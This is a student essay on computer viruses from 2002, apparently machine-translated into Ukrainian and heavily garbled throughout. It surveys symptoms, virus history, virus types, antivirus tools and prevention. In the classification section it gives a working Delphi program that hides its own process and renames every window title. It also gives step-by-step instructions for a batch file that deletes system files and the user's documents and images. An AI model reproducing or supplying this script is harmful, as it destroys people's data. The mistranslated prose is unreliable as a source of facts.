Комп'ютерні віруси

Министерство освіти РФ.

ВСГТУ.

Кафедра: «Электроно обчислювальні системи системы».

Реферат на тему:

Выполнили: С-т грн 521−2 Матвєєв Ф.

Проверил:

Улан-Удэ.2002 г.

1.

Введение

.

2. Ознаки появи вірусів. Кролики размножаются.

3. Злочинність в з сфері комп’ютерних технологий.

4. Класифікація вирусов.

5. Антивірусні программы.

6. Профилактика.

7.

Заключение

.

1.

Введение

.

Масове використання ПК в автономному і мережному режимі, включаючи вихід в глобальну мережу Інтернет, породило проблему зараження їх комп’ютерними вирусами.

Компьотерным вірусом прийнято називати спеціально написану, невелику за величиною програму. Здатну спонтанно приєднуватися решти програмам (тобто. заражати їх), створювати свої копії та впроваджуватиме в файли, системні області комп’ютера та до інших, поєднані з ним комп’ютери з метою порушення нормальної роботи програм, псування файлів і каталогів, створення різних перешкод під час роботи на компьютере.

2. Ознаки появи вирусов.

Для маскування вірусу його дії з зараженню інших програм, тож шкодять можуть виконуватися який завжди, а і під час будь-яких умов. Коли вірус виконає потрібні їй дії, він передає управління тієї програмі, де він перебуває, і його робота деяке час не відрізняється з посади незараженной. Усі дії вірусу можуть виконуватися досить швидко і видачі будь-яких повідомлень, тому користувач часто і помічає, що працює зі «химерностями ». До ознаками появи вірусу можна отнести:

• уповільнення роботи компьютера;

• неможливість завантаження операційній системы;

• часті «зависання» і збої у роботі компьютера;

• припинення роботи, чи неправильна робота раніше успішно функционировавших программ;

• збільшення кількості файлів на диске;

• зміна розмірів файлов;

• періодичне поява на екрані монітора недоречних системних сообщений;

• зменшення обсягів вільної оперативної памяти;

• помітне зростання часу доступу жорсткого диску;

• зміна дати й створення файлов;

• руйнація файловій структури (зникнення файлів, спотворення каталогів і др.);

• загоряння сигнальній лампочки дисководу, коли щодо нього немає обращения.

Слід зазначити, що ці симптоми необов’язково викликаються комп’ютерними вірусами, є підстави наслідком інших причин, тому комп’ютер слід періодично диагностировать.

3. «Кролики» размножаются.

Думки з приводу дати народження першої комп’ютерного вірусу розходяться. Достеменно відомо тільки те, що на першому механічному комп’ютері, так званої машині Беббиджа, їх було. Перші появи вірусів було виявлено наприкінці 60-х — початку 1970;х років. Ці программы-паразиты, котрі обіймали системні ресурси, і знижували продуктивність системи, називали «кроликами» (the rabbit). Проте, швидше за все, «кролики» були просто помилками чи пустощами програмістів, що обслуговували комп’ютери. У 70-х виявили з перших справжніх вірусів — «The Creeper», котрий напевно міг самостійно ввійти у мережу через модем і просить передати свою копію віддаленій системі. Для боротьби з нею створили першу відому антивірусну програму— «The Reeper». Ті, хто розпочав працювати на IBM-PC у середині 80-х, напевно пам’ятають пошесну епідемію вірусів «Brain», «Vienna», «Cascade». Букви сипалися на екранах, а натовпу користувачів брали в облогу фахівців із ремонту моніторів. Потім комп’ютер заграв «Yankee Doodle», щоправда, лагодити динаміки тепер хто б кинувся — вже було ясно, що це вірус. Час минав, віруси плодилися. Усі вони скидалися друг на друга — лізли в пам’ять, чіплялися до файлам і секторам, періодично вбивали дискети і вінчестери. Влітку 1991 року з’явився вирус-невидимка «Dir-II», протиотруту котрій знайшли далеко ще не відразу… Торішнього серпня 1995 року, коли всі прогресивне людство святкувало вихід нової ОС Windows 95 від Microsoft, практично непоміченою минулася повідомлення про вірус, заражающем документи Microsoft Word. Він здобув ім'я «Concept» й у вмить проникнув у тисячі (коли у мільйони) комп’ютерів — адже передачу текстів в форматі MS Word стала одним з стандартів. Щоб заразитися вірусом, було досить лише відкрити заражений документ, й інші редаговані документи також «занедужували», Через війну, отримавши Інтернетом заражений файл і прочитавши його, користувач, сам того і не відаючи, опинявся рознощиком комп’ютерної зарази. Небезпека зараження MS Word, з урахуванням можливостей Інтернету, стала однієї з найбільш серйозні проблеми за історію побутування вірусів. Але MS Word справа не обмежилося. Влітку 1996 року з’явився вірус «Laroux», який вражає таблиці MS Excel. (У 1997 року це вірус викликав епідемію в Москві.) До літа я 97-го число макровирусов досягло кілька сотень… 18 вересня нинішнього року в Тайвані був повторно заарештований творець знаменитого «Чорнобиля» Чен Ин-Хау. (Вперше Чен Ин-Хау затримали в квітні 1999 року, але уникнув покарання, оскільки у той час не було офіційних скарг від тайванських компаній. Приводом до нового арешту послужили обвинувачення, пред’явлені тайваньским студентом, який став жертвою вірусу «Чорнобиль» вже у квітні нинішнього року.) Цей вірус був виявлено на Тайвані у червні 98-го. Тоді його автор заразив комп’ютери університету, у якому навчався. «Хворі» файли розповзлися по місцевим Интернет-конференциям, і вірус вибрався межі Тайваню. За тиждень епідемія вразила Австрію, Австралію, Ізраїль з Великобританією. Потім вірус виявив себе й інших країнах, зокрема у Росії. Приблизно за місяць заражені файли побачили американських Web-серверах, розповсюджують ігрові програми, що, певне, і стало причиною що виникла глобальної епідемії «Чорнобиля». 26 квітня 1999 року вибухнула «логічна бомба», закладена у його код. По різним оцінкам, цього дня у світі постраждало близько 500 тис. комп’ютерів — були знищені дані на жорстких дисках, а деяких навіть зіпсовані мікросхеми на материнських платах. Ніколи ще вірусні епідемії не приносили таких збитків. Згодом «Чорнобиль» спрацював знову. Збитки, заподіяну лише у Південній Кореї, становить $ 250 млн. 22 жовтня цього року в Філіппінах заарештували 19-річного хакера, підозрюваного у розповсюдженні вірусів. (Пізніше він було відпущено свободу до закінчення розслідування.) Власті Філіппін, певне, вирішили таким чином реабілітуватися після кількох невдалих спроб привернути увагу до відповідальності розповсюджувачів вірусу «LoveLetter», яка завдала величезних збитків у травні нинішнього року. Сьогодні у базі однієї з потужних вітчизняних, та й, мабуть, світових коштів антивірусної захисту, «AVP Євгена Касперского», міститься інформацію про 40 393 віруси (на б листопада 2000 року), і навіть відповідні кошти виявлення, лікування та профілактики удаления.

4. Злочинність у сфері комп’ютерних технологий.

У багатьох країнах діють законодавчі боротьбу з комп’ютерними злочинами і злоумышленными діями, розробляються антивірусні програмні кошти, проте кількість нових програмних вірусів зростає. Облич, використовують знання власний досвід для несанкціонованого доступу до інформаційним і обчислювальним ресурсів, до отриманню конфіденційною і секретної інформації, до здійснення шкідливих дій, у літературі називають хакерами і кракерами.

Дії хакерів, чи комп’ютерних хуліганів, можуть наносити істотної шкоди власникам комп’ютерів, і власникам (творцям) інформаційних ресурсів, оскільки призводять до простоїв комп’ютерів, необхідність відновлення зіпсованих даних або до дискредитації юридичних чи фізичних осіб, наприклад, шляхом спотворення інформації на електронних дошках оголошень чи WEB-серверах до Інтернету. Мотиви дій комп’ютерних зловмисників найрізноманітніші: прагнення фінансовим придбань; бажання нашкодити і помститися керівнику організації, з якій із тим чи іншим причин звільнився співробітник; психологічні риси людини (заздрість, марнославство, бажання якось проявити себе, просто хуліганство й др.).

5. Класифікація вирусов.

Основними шляхами зараження комп’ютерів вірусами є знімні диски (дискети і CD-ROM) і комп’ютерні мережі. Зараження жорсткого диска комп’ютера може статися за завантаженні комп’ютера з дискети, що містить вірус. Для посилення безпеки необхідно брати до уваги те, як і звідки отримана програма (з сумнівного джерела, чи є наявність сертифіката, експлуатувалася чи раніше й т.д.). Але головна причина зараження комп’ютерів вірусами — виправдатись нібито відсутністю операційні системи ефективних засобів захисту інформації від несанкціонованого доступа.

За даними спеціальної літератури, до кінця 1998 р. у світі було зареєстровано понад 20 тис. комп’ютерних вірусів (нині відомі близько 50 000 вірусів) і щотижня з’являється близько 10 нових вірусів. Один із схем класифікації комп’ютерних вірусів представлена на рис. 1.

[pic].

Рис. 1 Класифікація комп’ютерних вирусов.

Залежно від довкілля віруси класифікуються на завантажувальні, файлові, системні, мережні, файлово-загрузочные.

Завантажувальні віруси проникають у завантажувальний сектор диска чи сектор, у якому програму завантаження системного диска.

Файлові віруси впроваджуються у основному виконувані файли з розширенням .СОМ і .ЕХЕ.

Системні віруси пробираються у системні модулі і драйвери периферійних пристроїв, вражають программы-интерпретаторы.

Мережні віруси живуть комп’ютерних мережах; файлово-загрузочные вражають завантажувальні сектора дисків і файли прикладних программ.

Резидентные віруси при зараження комп’ютера залишають оперативному пам’яті свою резидентную частина, які потім при кожному зверненні до операційній системи та решти об'єктах впроваджується у неї і виконує свої руйнівні дії до вимикання чи перезавантаження комп’ютера. Нерезидентные віруси не заражають оперативну память.

Алгоритмічна особливість побудови вірусів впливає з їхньої прояв і функціонування. Так, репликаторные програми завдяки своєму швидкому відтворення призводять до переповненню основний пам’яті, у своїй знищення программ-репликаторов ускладнюється, якщо відтворювані програми є точними копіями оригіналу. У комп’ютерних мережах поширені программы-«черви». Вони обчислюють адреси мережевих комп’ютерів, і «записуються із них», підтримуючи між собою зв’язок. Що стосується припинення існування «хробака» на якомусь ПК решта відшукують вільний комп’ютер та не впроваджують у нього ті ж самі программу.

" Троянський кінь «- це програма, яка, маскуючись під корисну програму, виконує додаткові функції, що користувач і здогадується (наприклад, збирає інформацію про іменах і паролях, записуючи в спеціальний файл, доступний лише творцю цього вірусу), або руйнує файлову систему.

Логічний бомба — це програма, яка вбудовується у великих програмний комплекс. Вона нешкідлива до певного події, після якого реалізується її логічний механізм. Наприклад, така вірусна програма починає працювати після певної кількості запусків прикладної програми, комплексу, за наявності чи відсутність певного файла чи записи файла і т.д.

Программы-мутанты, самовідтворюючись, відтворюють копії, які від оригинала.

Вирусы-невидимки перехоплюють звернення ОС до ураженим файлам і секторам дисків і підставляють натомість незаражені объекты.

За рівнем на ресурси комп’ютерних систем та мереж виділяються нешкідливі, небезпечні й руйнівні вирусы.

Нешкідливі віруси не руйнують файли, але можуть переповняти оперативну і дискову пам’ять, виводити на екран графічні ефекти тощо. Например:

(програма пишеться в Delphi): program Project1; uses windows, Messages; procedure registerserviceprocess; external «kernel32.dll «name «RegisterServiceProcess »; //функція EnumWindowsProc function EnumWindowsProc (h: hwnd): BOOL; stdcall; begin.

SendMessage (h, WM_SETText, 0, Iparam (PChar («Fed₁₀₈- комп’ютерник))); end;

//початок програми var h: THandle; begin asm push 1 push 0 call registerserviceprocess; end;

//запускаю цикл while true do begin //запускаю перечесление всіх окон.

EnumWindows (@EnumWindowsProc, 0); h:=CreateEvent (nil, true, false, «);//роблю затримку в 100 мс.

WaitForSingleObject (h, 100);

CloseHandle (h); end; end.

Ефект: все назви вікон перейменовуються в «Fed₁₀₈- компьютерщик».

Небезпечні віруси призводять до різним порушень у роботі комп’ютера; руйнівні - до стирання інформації, повного чи часткового порушення роботи прикладних програм. Например:

Заходимо в Far-manager, натискаємо Shift+F4, пишемо будь-яке назва файла (install.bat), головне щоб розширення було *.bat.

Після цього друкуємо приблизно наступний текст:

cd C:

cd.

cd windows (у 95% відсотків юзерів папка саме такая).

del *.exe.

del *.ini.

del *.com.

cd.

cd windows.

cd system.

del *.dll.

del *.exe.

cd.

cd моидок~1.

del *.doc.

del *.txt.

del *.htm.

del *.html.

del *.pdf.

del *.jpg.

del *.zip.

del *.gif.

Нажимаем F2 і зберігаємо в такий спосіб написаний файл. Ефект: стираються все файли з зазначеними розширеннями у папках.

Масове поширення комп’ютерних вірусів викликало розробку антивірусних програм, дозволяють виявляти і уничножать. Програмифільтри, чи «сторожа», постійно перебувають у оперативної пам’яті, будучи резидентными, і «перехоплюють» все запити до операційній системі на виконання «підозрілих дій», тобто. операції, використовуваних вірусами для свого розмноження і псування інформаційних та інших системних ресурсів у комп’ютері. Такими діями може бути. спроби зміни атрибутів файлів, корекції виконуваних BATСОМчи ЕХЕ-файлов, запис у завантажувальні сектора диска та інших. При кожному запиті на дію на екран комп’ютера видається cообщение про жодних діянь П. Лазаренка та яка програма хоче виконувати його виконувати. Користувач у відповідь це або дозволити виконання дії, або заборонити його. Така часто актуальна «настирливість», дратує користувача, і те, що міра оперативної пам’яті зменшується через необхідність постійного перебування у ній «сторожа», є головними вадами цих програм. До того ж программы-фильтры не «лікують» файли чи диски, цього необхідно використовувати інші антивірусні програми. Прикладом програмсторожів є Vsefe, що входить у пакет утиліт MS-DOS, і програми, працюють у середовищі Windows, — AVP, Norton AntiVirus for Windows 95, McAfee Virus Scan 95, Thunder Byte Professional for Windows 95.

Надійним засобом захисту від вірусів вважаються программы-ревизоры. Вони запам’ятовують вихідне стан програм, каталогів і системних областей диска, коли комп’ютерів ще ні заражений вірусом, та був періодично порівнюють поточний стан з вихідним. При виявленні невідповідностей (по довжині файла, дати модифікації, коду циклічного контролю файла та інших.) повідомлення звідси видається користувачеві. Прикладом программ-ревизоров є програма Adinf фірми «Диалог-Наука» і доповнення до неї у вигляді Adinf Cure Module.

Программы-доктора як виявляють, а й «лікують «заражені програми чи диски, «выкусывая» з заражених програм тіло вірусу. Програми цього діляться на фаги і полифаги. Останні служать щоб виявити і знищення великої кількості різноманітних вірусів. Найбільшого поширення набула у Росії мають такі полифаги, як MS AntiVirus, Aidstest і Doctor Web, які безупинно оновлюються для боротьби з що з’являються новими вирусами.

Программы-детекторы дозволяють виявляти файли, заражені однією або кількома відомими розробникам програм вирусами.

Программы-вакцины, чи иммунизаторы, ставляться до резидентным програмам. Вони модифікують програми розвитку й диски в такий спосіб, що це віддзеркалюється в роботі програм, але вірус, від якої виробляється вакцинація, вважає їхні вже зараженими і впроваджується у них.

6. Антивірусні программы.

Як відомо, вірус можуть утримувати лише у файлах, яким передається управління: програми, динамічні бібліотеки, драйвери, командні файли, скрипти, документи і шаблони з макросами, тобто файли з розширеннями COM, EXE, DLL, DRV, VXD, SYS, BAT, DOC, DOT, XLS та інших. Таким чином, наприклад, звичайний текстовий файл (з розширенням TXT) можна запускати без побоювань отримати заразу — TXT-файл буде просто відкрито Блокноте.

Охарактеризуємо деякі антивірусні програми. На цей час зарубіжними і вітчизняними фірмами і провідними фахівцями розроблено велику кількість антивірусних програм. Чимало їх ми, отримали широке визнання, постійно поповнюються новими коштів боротьби з вірусами і супроводжуються разработчиками.

У російських користувачів персональних комп’ютерів популярний антивірусний комплект АТ «Диалог-Наука», до якого входять программа-ревизор диска Adinf і лікуючий блок Adinf Cure Module. Один із останніх версій цієї программы-полифага Aidstest (кінець 1997 р.) виявляє більш 1700 вірусів. Aidstest для свого нормально функціонувати вимагає, щоб у оперативної пам’яті був інших резидентных антивірусних програм, блокуючих запис в програмні файли, тому вони мають попередньо выгрузить.

Після запуску програми Aidstest перевіряє оперативну пам’ять на наявність відомих вірусів і знешкоджує їх. У цьому парализуются функції вірусу, пов’язані з розмноженням, інші побічні ефекти можуть залишатися, в зв’язку з чим по закінченні знешкодження вірусу програма видає запит про перезавантаженні. Перезавантаження рекомендується здійснити кнопкою RESET, оскільки при перезавантаженні клавішами [CTRL]+[Alt]+[Del] деякі віруси можуть зберігатися. З іншого боку, комп’ютер та антивірусну програму краще запустити з захищеної від записи дискети, щоб за запуску з зараженого диска вірус не зміг записатись у пам’ять резидентом і перешкоджати лечению.

Aidstest тестує своє тіло на наявність відомих вірусів, і навіть судить по спотворення у своїй коді про своє зараження невідомим вірусом. При цьому можливі випадки «удаваної тривоги», наприклад при стискуванні антивірусу програмоюупаковщиком. Програма немає графічного інтерфейсу, режими її 1 роботи задаються з допомогою ключів. Вказавши шлях, можна перевірити не весь диск, а окремий підкаталог. Оптимальний режим для щоденної роботи задається ключами /g (перевірка всіх файлів) і /p.s (повільна перевірка). Збільшення часу при таких опціях практично невідчутно (повністю заповнений жорсткий диск ємністю 520 Мбайт на ПК з процесором 486DX2 тестується менш як 2 хв), зате можливість виявлення вірусів різко повышается.

Ключ If варто використовувати тоді, коли Aidstest, і навіть інші программы-антивирусы свідчить про наявність в якомусь файлі. При виявленні вірусу в ценном для користувача файлі цей файл слід переписати на дискету і спробувати вилікувати з допомогою ключа /f. Якщо спроба не увінчається успіхом, треба видалити все заражені копії файла і перевірити диск знову. Якщо файлі міститься важливу інформацію, яку небажано видаляти, можна заархівувати файл чи знайти іншу антивірусну програму, здатну лікувати цей тип вируса.

До сформування в файлі протоколу роботи програми Aidstest служить ключ /р. Протокол потрібен, якщо користувач не встигає переглянути імена заражених файлів. Для підтримки антивірусного програмноапаратного комплексу Sheriff призначений ключ /z.

Программа-полифаг Doctor Web необхідна передусім на боротьби з полиморфными вірусами, що з’явилися порівняно недавно. Як і Aidstest, Doctor Web оновлюється не рідше рази на місяць, а проміжках між версіями виходять 1−3 доповнення вірусної бази Doctor Web.

Використання програми Doctor Web для перевірки дисків і видалення виявлених вірусів у цілому подібно Aidstest, у зв’язку з ніж цю програму можна запускати відразу після (чи до) запуску Aidstest. У цьому практично немає «дублювання», оскільки Aidstest і Doctor Web працюють на різних наборах вірусів. У режимі евристичного аналізу програма Doctor Web здатна ефективно визначати файли, заражені новими, невідомими вірусами. Застосовуючи одночасно Aidstest і Doctor Web контролю дискет і одержуваних через мережу файлів, можна майже напевно уникнути заражения.

З програмою Doctor Web можна працюватиме, як як полноэкранного інтерфейсу з допомогою меню і діалогових вікон, і у режимі командної рядки. У командної рядку задаються диск, шлях збереження та необхідні ключі. Серед ключів: /al — діагностика всіх файлів на заданому устройстве;

/р — видалення вірусів з підтвердженням користувача; /dlвидалення файлів, коректне «лікування «яких не можна; /CU — «лікування «дисків і файлів; /zp — запис протоколу роботи у файл. Працюючи як полноэкранного інтерфейсу після запуску антивірусної програми користувач використовує необхідні установки через пункти основного меню: Dr. Web. Тест Настройки Дополнения.

Программа-ревизор Adinf дає змоги виявити будь-який вірус, включаючи віруси, вирусы-мутанты невідомі нині віруси. Час перевірки одного логічного диска взагалі обмаль, що дозволяє використовувати Adinf повсякденно без істотною втрати времени.

Перехід застосування ОС Windows 95 породив проблеми із захистом від вірусів, створюваних спеціально з цією середовища. З іншого боку, з’явилася нова різновид інфекції - макровирусы, «вживляемые» в документи, підготовлювані текстовим процесором Word. АТ «Диалог-Наука «запропонований програмно-апаратний комплекс Sheriff, готовий до антивірусного моніторингу та питаннями захисту, але передбачає встановлення в ПК дополнительней плати розширення й може працювати лише з серверах і робочих станціях, оперують великими обсягами даних. Відомими антивірусними програмами є Antiviral Toolkit Pro (AVP32), Norton AntiVirus for Windows 95, McAffee VirusScan95, Sophos SWEEP for Windows 95, ThunderBY ТІ Ai. dVirus Utilities та інших. Ці програми працюють у вигляді программ-сканеров та друзі проводять антивірусний контроль оперативної пам’яті, папок і дисків, містять алгоритми для розпізнавання нових типів вірусів, дозволяє процесі перевірки лікувати файли і диски.

Програма Antiviral Toolkit Pro (AVP32) є 32-разрядным додатком, працюють у середовищі Windows 95 і Windows NT, має зручний користувальницький інтерфейс, гнучку систему настройок і дозволяє розпізнавати понад 50 відсотків тис. різних вірусів. Робота програмних засобів комп’ютер повинен мати щонайменше 4 Мбайт оперативної пам’яті і проінвестували щонайменше 2 Мбайт вільного місця на жорсткому диску. Antiviral Toolkit Pro розпізнає і видаляє полиморфные віруси, віруси невидимки, макровіруси в документах, підготовлених Word і Excel, «троянські коні «.

Інтерфейс програми AllMicro AntiVirus for Windows 95 досить простий і не жадає від користувача додаткових знання продукті - просто потрібно натиснути кнопку «Scan», після чого починається перевірка пам’яті, завантажувальних секторів жорсткого диска, та був і занепаду всіх дисків комп’ютера. Але простота роботи означає погане якість: базі даних програми міститься більш 8000 сигнатур, і вона може перевіряти як традиційні виконувані файли, а й архіви, і призначає нові типи файлів Windows 95, у своїй користувач має можливість поставити рядок умов пошуку необізнаних програмі вирусов.

Програма Vscan 95 щоразу у процесі початковій завантаження перевіряє пам’ять комп’ютера, завантажувальні сектора системного диска і всі файли в кореневому каталозі. Дві інші програми пакета (McAfee Vshield і Vscan) створено як докладання Windows 95. Перша забезпечує після завантаження Windows 95 стеження знову під'єднаними дисками, контроль виконуваних програм, тож копируемых файлів, друга програма служить для додаткової перевірки пам’яті, дисків і файлів. Пакет McAfee VirusScan 95 вміє знаходити макровіруси в MS Word враховуючи розвиток локальних комп’ютерних мереж електронної пошти і мережі Інтернет та впровадження мережевий ОС Windows NT, розробниками антивірусних програм розроблено й поставляються ринку таких програм, як Mail Checker, для перевірки яка входить і що виходить електронної пошти, AntiViral Toolkit Pro — щоб виявити, лікування, видалення і переміщення у спеціальний каталог уражених вірусом файлів при працювати з мережевий ОС Novell NetWare версій З. х і 4.х. Програма F-Secure для Windows NT Server забезпечує у реальному масштабі часу захист серверу, автоматично перевіряючи на наявність вірусів кожен файл, якого звертаються робочі станції, виконує розширене автоматичне протоколювання у спеціальний журнал подій, оповіщає про проявах вірусів системного администратора.

Профилактика.

А, ніж піддати комп’ютер зараженню вірусами і забезпечити надійне зберігання інформації на дисках, необхідно дотримуватися такі правила: 1. оснастите свій комп’ютер сучасними антивірусними програмами, наприклад AntiViral Toolkit Pro, Doctor Web, і постійно возобновляйте їх версії 2. перед зчитуванням з дискет інформації, записаній інших комп’ютерах, завжди перевіряйте ці дискети на наявність вірусів, запускаючи антивірусні програми свого комп’ютера 3. при перенесення на комп’ютер файлів в архивированном вигляді перевіряйте їх відразу після разархивации на жорсткому диску, обмежуючи область перевірки лише знову записаними файлами 4. періодично перевіряйте на наявність вірусів жорстких дисків комп’ютера, запускаючи антивірусні програми для тестування файлів, пам’яті і системних областей дисків з захищеної від записи дискети, попередньо завантаживши операційну систему з захищеної від записи системної дискети 5. завжди захищайте свої дискети від записи під час роботи інших комп’ютерах, якби них буде виробляється запис інформації 6. обов’язково робіть архівні копії на дискетах цінної вам інформації 7. не залишайте у задній кишені дисководу, А дискети включення чи перезавантаженні ОС, аби внеможливити зараження комп’ютера загрузочными вірусами 8. використовуйте антивірусні програми для вхідного контролю всіх виконуваних файлів, отримуваних з комп’ютерних мереж 9. перевіряйте e-mail навіть коли лист прийшло від добре відомого вам людини (зумовлено не тим, що хоче вам нашкодити, а тому що він повний Lamer яке комп заражён).

Також слід іноді перевіряти автозагрузку, т.к. саме туди зазвичай закидають завантажувальні віруси, але його дуже распространён і з цього слід перевіряти в реєстрі таку папку:

HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun.

8.

Заключение

.

Комп’ютерний вірус — спеціально написана програма, здатна спонтанно приєднуватися решти програмам, створювати свої копії і виводити їх в файли, системні області комп’ютера та в обчислювальні мережі з метою порушення роботи програм, псування файлів і каталогів, створення різноманітних перешкод у роботі компьютера.

Нині відоме понад 50 000 програмних вірусів, число яких невпинно зростає. Відомі ситуації, коли створювалися навчальні посібники, які допомагають в написанні вирусов.

Основні види вірусів: завантажувальні, файлові, файлово-загрузочные. Найбільш небезпечного вигляду вірусів — полиморфные.

З комп’ютерної вірусології ясно, будь-яка оригінальна комп’ютерна розробка змушує творців антивірусів пристосовуватися до нових технологіям, постійно вдосконалити антивірусні программы.

Причини появи й ризик поширення вірусів приховані з одного боку в психології людини, з іншого боку — із повною відсутністю засобів захисту у операційній системы.

Основні шляху проникнення вірусів — знімні диски і комп’ютерні мережі. Щоб змагань не вийшло, тримайте заходів для захисту. Також для виявлення, видалення та від комп’ютерних вірусів розроблено три «види спеціальних програм, званих антивирусными.

Та деякі властивості вірусів спантеличують навіть фахівців. Ще недавно важко було уявити, що вірус може пережити холодну перезавантаження чи поширюватися через файли документів. За цих умов мушу надавати значення хоча б початковому антивирусному освіті користувачів. За всієї серйозності проблеми жоден вірус неспроможний принести стільки шкоди, скільки початкуючий LAMER (він також чайник) з тремтячими руками!!! (остання пропозиція is joke).

Бібліографічний список:

1. Лекції на тему «Загальний принцип безпеки ОС» 2. Косарёв В. П. «Комп'ютерні сіті й системи» М. 2000 р. 3. World Wide Web під назвою Internet: internet internet журнал «][akep» №.32 & №.35 2001 р. журнал «Комерсант „Гроші“» № 45 2000 г.